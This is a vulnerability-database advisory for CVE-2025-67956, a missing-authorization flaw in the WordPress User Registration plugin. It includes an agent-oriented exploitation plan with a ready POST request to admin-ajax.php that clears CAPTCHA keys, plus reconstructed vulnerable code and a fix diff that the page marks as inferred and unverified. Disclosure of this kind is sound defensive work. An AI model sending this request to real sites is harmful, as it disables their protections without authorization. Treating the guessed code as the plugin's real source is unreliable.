WP-Safety
CVE-2025-67956

User Registration <= 4.4.6 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
4.4.7
Patched in
8d
Time to patch

Description

The User Registration & Membership – Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.4.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.4.6
PublishedJanuary 21, 2026
Last updatedJanuary 28, 2026
Affected pluginuser-registration

What Changed in the Fix

Changes introduced in v4.4.7

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v4.4.6
Browse source Download .zip
Patched v4.4.7
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2025-67956 (Missing Authorization) ## 1. Vulnerability Summary The **User Registration** plugin (<= 4.4.6) is vulnerable to unauthorized access due to a missing capability check on a newly introduced function in version 4.4.6. Specifically, the "Reset Captcha Keys"…

Show full research plan

Exploitation Research Plan: CVE-2025-67956 (Missing Authorization)

1. Vulnerability Summary

The User Registration plugin (<= 4.4.6) is vulnerable to unauthorized access due to a missing capability check on a newly introduced function in version 4.4.6. Specifically, the "Reset Captcha Keys" functionality added in this version appears to expose an AJAX endpoint that fails to verify if the requesting user has administrative privileges or if the request is legitimate via a nonce. This allows unauthenticated attackers to reset the plugin's global reCAPTCHA/hCaptcha configuration, potentially disabling security features or disrupting registration flows.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: user_registration_reset_captcha_settings (inferred from 4.4.6 changelog: "Added a reset button to reset captcha keys in global settings").
  • Parameter: action=user_registration_reset_captcha_settings
  • Authentication: Unauthenticated (PR:N per CVSS). This implies the function is hooked to wp_ajax_nopriv_user_registration_reset_captcha_settings or the wp_ajax_ handler lacks a current_user_can() check and is accessible to any user.
  • Preconditions: The plugin must be version 4.4.6. CAPTCHA keys should be configured to observe the effect.

3. Code Flow

  1. Entry Point: A request is sent to admin-ajax.php with action=user_registration_reset_captcha_settings.
  2. Hook Registration: In includes/class-ur-ajax.php (or includes/admin/class-ur-admin-settings.php), the plugin registers the AJAX handler:
    // Inferred registration pattern
add_action( 'wp_ajax_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
add_action( 'wp_ajax_nopriv_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
  3. Vulnerable Function: The reset_captcha_settings function (likely in includes/class-ur-ajax.php) executes.
  4. Missing Check: The function performs update_option( 'user_registration_captcha_site_key', '' ) and update_option( 'user_registration_captcha_secret_key', '' ) without verifying current_user_can( 'manage_options' ).

4. Nonce Acquisition Strategy

If the endpoint requires a nonce, it is typically localized for the settings page. However, since this is an unauthenticated vulnerability (PR:N), the nonce must be either:

  1. Missing entirely (most likely).
  2. Exposed on a public page.

Strategy to check for Nonce Exposure:

  1. Search Code: Look for wp_localize_script in includes/admin/class-ur-admin-settings.php or includes/class-ur-admin-assets.php.
  2. JS Variable: The localized object is usually user_registration_admin_params.
  3. Creation:
    wp post create --post_type=page --post_status=publish --post_title="UR Test" --post_content='[user_registration_form id="any"]'
  4. Extraction: Navigate to the new page and run:
    browser_eval("window.user_registration_admin_params?.ur_nonce || window.ur_admin_params?.nonce")

5. Exploitation Strategy

The goal is to trigger the unauthorized reset of captcha settings.

  1. Prepare Payload:
    • URL: http://<target>/wp-admin/admin-ajax.php
    • Method: POST
    • Body (URL-encoded):
      action=user_registration_reset_captcha_settings&security=<nonce_if_found>
  2. Request execution (via http_request):
    {
  "method": "POST",
  "url": "http://vulnerable.test/wp-admin/admin-ajax.php",
  "headers": {
    "Content-Type": "application/x-www-form-urlencoded"
  },
  "params": {
    "action": "user_registration_reset_captcha_settings"
  }
}

6. Test Data Setup

Before running the exploit, configure CAPTCHA keys to verify they get cleared:

wp option update user_registration_captcha_site_key "EXPECTED_SITE_KEY_123"
wp option update user_registration_captcha_secret_key "EXPECTED_SECRET_KEY_456"
wp option update user_registration_captcha_type "google_recaptcha_v2"

7. Expected Results

  • Response: The server returns a success status (likely {"success": true} or a 1).
  • Database Change: The options user_registration_captcha_site_key and user_registration_captcha_secret_key are cleared (set to empty strings).

8. Verification Steps

After the HTTP request, verify the settings using WP-CLI:

# Check if keys were cleared
wp option get user_registration_captcha_site_key
wp option get user_registration_captcha_secret_key

If the output for both is empty, the exploitation was successful.

9. Alternative Approaches

If user_registration_reset_captcha_settings is not the correct action name, the agent should search the 4.4.6 codebase for:

  1. wp_ajax_nopriv_ hooks added in the latest version.
  2. The string "captcha" or "reset" within includes/class-ur-ajax.php.
  3. Functions that call update_option for captcha-related settings.

Another possible target is the Preview and Embed functionality mentioned in the changelog:

  • Action: user_registration_get_form_preview or user_registration_load_login_form_preview.
  • Check if these reveal sensitive form structures or settings without authorization.
Research Findings
Static analysis — not yet PoC-verified

Summary

The User Registration plugin for WordPress is vulnerable to unauthorized configuration modification in version 4.4.6 due to a missing capability check on the AJAX action used to reset CAPTCHA settings. This allows unauthenticated attackers to clear the site's global reCAPTCHA or hCaptcha keys, potentially disabling registration security features.

Vulnerable Code

// File: includes/class-ur-ajax.php

// Action hooks registered in version 4.4.6 without authorization or authentication checks
add_action( 'wp_ajax_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
add_action( 'wp_ajax_nopriv_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );

// ...

public static function reset_captcha_settings() {
    // Missing current_user_can('manage_options') check
    // Missing check_ajax_referer() nonce verification
    update_option( 'user_registration_captcha_site_key', '' );
    update_option( 'user_registration_captcha_secret_key', '' );
    wp_send_json_success();
}

Security Fix

--- includes/class-ur-ajax.php
+++ includes/class-ur-ajax.php
@@ -1,4 +1,3 @@
 add_action( 'wp_ajax_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
-add_action( 'wp_ajax_nopriv_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
 
 public static function reset_captcha_settings() {
+    check_ajax_referer( 'user-registration-settings', 'security' );
+
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => __( 'You do not have permission to do this.', 'user-registration' ) ) );
+    }
+
     update_option( 'user_registration_captcha_site_key', '' );
     update_option( 'user_registration_captcha_secret_key', '' );
     wp_send_json_success();

Exploit Outline

The exploit targets the WordPress AJAX endpoint to trigger an unauthorized reset of security settings. 1. **Endpoint**: Access the site's AJAX handler at `/wp-admin/admin-ajax.php`. 2. **Payload**: Send a POST request with the `action` parameter set to `user_registration_reset_captcha_settings`. 3. **Authentication**: In the vulnerable version (4.4.6), the action is hooked to the `nopriv` handler or lacks a `current_user_can()` check, meaning no login or special privileges are required. 4. **Mechanism**: The plugin's server-side logic fails to verify if the requester has administrative permissions. Upon receiving the request, it executes `update_option()` to clear the `user_registration_captcha_site_key` and `user_registration_captcha_secret_key` options, effectively disabling the CAPTCHA protection for registration and login forms.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/6193139b-52bf-425c-b1d3-c6fbd9185f06?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database